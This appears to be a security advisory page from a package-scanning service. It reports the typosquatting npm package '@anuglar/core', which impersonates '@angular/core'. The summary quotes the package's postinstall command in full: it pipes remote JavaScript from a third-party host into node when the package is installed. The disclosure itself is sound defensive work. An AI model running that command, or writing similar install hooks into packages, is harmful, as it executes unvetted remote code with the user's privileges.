Logo
npm

@anuglar/core@22.2.1

Vulnerability report · Last retrieved from osv.dev October 5, 2026 at 7:27 AM UTC

Malicious

OSV ID

MAL-2026-17541

Ecosystem

npm

Summary

Package name '@anuglar/core' is a one-character transposition of '@angular/core' and copies the legitimate package's description ('Angular - the core framework'), author ('angular'), and repository URL to impersonate it. The package.json postinstall lifecycle script runs curl -L https://web.archive.org/web/https://gitflic.ru/project/hellscripter/install-scripts/blob/raw?file=node.js | node, downloading arbitrary JavaScript from a third-party host (gitflic.ru, fetched via web.archive.org) and piping it directly into node for execution on npm install. The fetched code is unpinned, unhashed, and not shipped in the tarball, so its contents can change at any time and are executed with the privileges of the installing user. The script also references ps and id for host reconnaissance.

Source: amazon-inspector (5f23ef78cc88817166cff7f8fdf3f1839c610880d960d9394e286da232058f98)

Protect your entire dependency tree

Scan your lock files automatically on every PR. Block malicious packages before they reach production.